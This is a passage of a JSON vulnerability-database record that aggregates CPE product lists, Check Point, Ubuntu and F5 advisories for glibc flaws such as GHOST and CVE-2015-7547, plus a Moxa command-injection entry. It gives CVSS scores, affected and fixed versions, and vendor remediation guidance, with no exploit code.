"cpe:2.3:a:oracle:exalogic_infrastructure:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:hp:server_migration_pack:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:hp:helion_openstack:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.20:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp3:*:*:*:vmware:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:helion_openstack:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management_software:9.319:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management_software:9.355:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.1:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:32", "description": "A command injection vulnerability exists in Multiple Moxa Products. Successful exploitation of this vulnerability could allow a remote, authenticated attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-29T00:00:00", "type": "checkpoint_advisories", "title": "Moxa Multiple Products Command Injection (CVE-2021-39279)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39279"], "modified": "2021-09-29T00:00:00", "id": "CPAI-2021-0707", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:38:42", "description": "The Linux glibc library is vulnerable to a stack-based buffer overflow. DNS client side resolvers using this library may be exploited by remote attackers. Successful exploitation would allow an attacker to execute arbitrary code on the target.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-18T00:00:00", "type": "checkpoint_advisories", "title": "DNS Client Resolver glibc Buffer Overflow (CVE-2015-7547)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2017-11-07T00:00:00", "id": "CPAI-2016-0120", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:52:42", "description": "A buffer overflow vulnerability, known as GHOST Vulnerability, exists in GNU C Library function. A remote attacker can exploit this vulnerability by providing crafted input to an application that uses this vulnerable function. Successful exploitation could result in code execution in the context of the affected application.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "checkpoint_advisories", "title": "GNU C Library gethostbyname Buffer Overflow (CVE-2015-0235)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-03-23T00:00:00", "id": "CPAI-2015-0075", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:50:17", "description": "The send_dg function in resolv/res_send.c in GNU C Library (aka glibc or\nlibc6) before 2.20 does not properly reuse file descriptors, which allows\nremote attackers to send DNS queries to unintended locations via a large\nnumber of requests that trigger a call to the getaddrinfo function.\n\n#### Bugs\n\n * <https://sourceware.org/bugzilla/show_bug.cgi?id=15946>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=722075>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | fixed by any/cvs-resolv-reuse-fd.diff in utopic\n", "cvss3": {}, "published": "2015-02-24T00:00:00", "type": "ubuntucve", "title": "CVE-2013-7423", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7423"], "modified": "2015-02-24T00:00:00", "id": "UB:CVE-2013-7423", "href": "https://ubuntu.com/security/CVE-2013-7423", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:48:12", "description": "Stack-based buffer overflow in the getaddrinfo function in\nsysdeps/posix/getaddrinfo.c in GNU C Library (aka glibc or libc6) 2.17 and\nearlier allows remote attackers to cause a denial of service (crash) via a\n(1) hostname or (2) IP address that triggers a large number of domain\nconversion results.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=704623>\n * <https://bugzilla.novell.com/show_bug.cgi?id=813121>\n * <http://sourceware.org/bugzilla/show_bug.cgi?id=15330>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | infinity is going to roll this into an SRU that he'll push through the ubuntu-security-proposed ppa\n", "cvss3": {}, "published": "2013-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2013-1914", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1914"], "modified": "2013-04-29T00:00:00", "id": "UB:CVE-2013-1914", "href": "https://ubuntu.com/security/CVE-2013-1914", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-22T21:47:46", "description": "Multiple stack-based buffer overflows in the (1) send_dg and (2) send_vc\nfunctions in the libresolv library in the GNU C Library (aka glibc or\nlibc6) before 2.23 allow remote attackers to cause a denial of service\n(crash) or possibly execute arbitrary code via a crafted DNS response that\ntriggers a call to the getaddrinfo function with the AF_UNSPEC or AF_INET6\naddress family, related to performing \"dual A/AAAA DNS queries\" and the\nlibnss_dns.so.2 NSS module.\n\n#### Bugs\n\n * <https://sourceware.org/bugzilla/show_bug.cgi?id=18665>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | stable-phone-overlay will be updated in OTA 9.1 tyhicks alerted the Snappy team for an emergency update\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-16T00:00:00", "type": "ubuntucve", "title": "CVE-2015-7547", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2016-02-16T00:00:00", "id": "UB:CVE-2015-7547", "href": "https://ubuntu.com/security/CVE-2015-7547", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-31T00:51:59", "description": "Heap-based buffer overflow in the __nss_hostname_digits_dots function in\nglibc 2.2, and other 2.x versions before 2.18, allows context-dependent\nattackers to execute arbitrary code via vectors related to the (1)\ngethostbyname or (2) gethostbyname2 function, aka \"GHOST.\"\n\n#### Bugs\n\n * <https://sourceware.org/bugzilla/show_bug.cgi?id=15014>\n", "cvss3": {}, "published": "2015-01-27T00:00:00", "type": "ubuntucve", "title": "CVE-2015-0235", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-27T00:00:00", "id": "UB:CVE-2015-0235", "href": "https://ubuntu.com/security/CVE-2015-0235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2021-06-08T18:49:10", "description": " \n\n\nThe send_dg function in resolv/res_send.c in GNU C Library (aka glibc or libc6) before 2.20 does not properly reuse file descriptors, which allows remote attackers to send DNS queries to unintended locations via a large number of request that trigger a call to the getaddrinfo function. ([CVE-2013-7423](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7423>))\n\nImpact \n\n\nThis vulnerability can only be exploited in F5 products by locally authenticated users. An attacker may be able to send DNS queries to unintended recipients, resulting in information disclosure or data loss due to the application encountering corrupted data. No remote vulnerabilities are known. \n\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nYou should permit access to F5 products only over a secure network and limit login access to trusted users. For more information, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {}, "published": "2015-07-02T21:32:00", "type": "f5", "title": "GNU C Library (glibc) vulnerability CVE-2013-7423", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7423"], "modified": "2016-01-09T02:23:00", "id": "F5:K16841", "href": "https://support.f5.com/csp/article/K16841", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-06-08T18:49:00", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nYou should permit access to F5 products only over a secure network and limit login access to trusted users. For more information, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {}, "published": "2015-07-02T00:00:00", "type": "f5", "title": "SOL16841 - GNU C Library (glibc) vulnerability CVE-2013-7423", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7423"], "modified": "2015-11-11T00:00:00", "id": "SOL16841", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16841.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-06-08T18:49:06", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, F5 recommends that you ensure that you use only trusted DNS resolvers in your BIG-IP configuration.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL9502: BIG-IP hotfix matrix\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-16T00:00:00", "type": "f5", "title": "SOL47098834 - glibc vulnerability CVE-2015-7547", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2016-10-25T00:00:00", "id": "SOL47098834", "href": "http://support.f5.com/kb/en-us/solutions/public/k/47/sol47098834.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-20T21:07:46", "description": "\nF5 Product Development has assigned ID 574060 to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP AAM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.4.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP AFM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.3.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP Analytics| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP APM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP ASM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP DNS| 12.0.0| 12.1.0 \n12.0.0 HF2| Severe| glibc DNS client side resolver \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP PEM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.3.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe*| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n*F5 WebSafe software is not affected by this vulnerability because the Linux kernel does not form part of the product. To address this vulnerability, F5 recommends that you upgrade the operating system that you use with the F5 WebSafe Dashboard using the standard OS tools.\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, F5 recommends that you ensure that you use only trusted DNS resolvers in your BIG-IP configuration.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-17T03:33:00", "type": "f5", "title": "glibc vulnerability CVE-2015-7547", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2017-03-10T00:27:00", "id": "F5:K47098834", "href": "https://support.f5.com/csp/article/K47098834", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-20T16:42:29", "description": "\nF5 Product Development has assigned ID 503237 (BIG-IP), ID 505635 (BIG-IQ), ID 505643 (Enterprise Manager), and ID 476571 (ARX) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H503301 on the **Diagnostics **&gt; **Identified** &gt;** High **screen.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions) **box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP AAM | 11.6.0* \n11.4.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 | glibc \nBIG-IP AFM | 11.6.0* \n11.3.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 | glibc \nBIG-IP Analytics | 11.6.0* \n11.0.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 | glibc \nBIG-IP APM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP ASM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP DNS | None | 12.0.0 | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* | 11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP GTM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP Link Controller | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP PEM | 11.6.0* \n11.3.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 | glibc \nBIG-IP PSM | 11.0.0 - 11.4.1* \n10.1.0 - 10.2.4* | 11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* | 11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP WOM | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* | 11.2.1 HF14 \n10.2.4 HF11 | glibc \nARX | 6.0.0 - 6.4.0* | None | glibc \nEnterprise Manager | 3.0.0 - 3.1.1* \n2.1.0 - 2.3.0* | 3.1.1 HF5 | glibc \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0* | 4.5.0 HF1 \n4.4.0 HF2 | glibc \nBIG-IQ Device | 4.2.0 - 4.5.0* | 4.5.0 HF1 \n4.4.0 HF2 | glibc \nBIG-IQ Security | 4.0.0 - 4.5.0* | 4.5.0 HF1 \n4.4.0 HF2 | glibc \nBIG-IQ ADC | 4.5.0* | 4.5.0 HF1 | glibc \nLineRate | None | 2.2.0 - 2.5.0 \n1.6.0 - 1.6.4 | None \nTraffix-SDC | 4.1.0 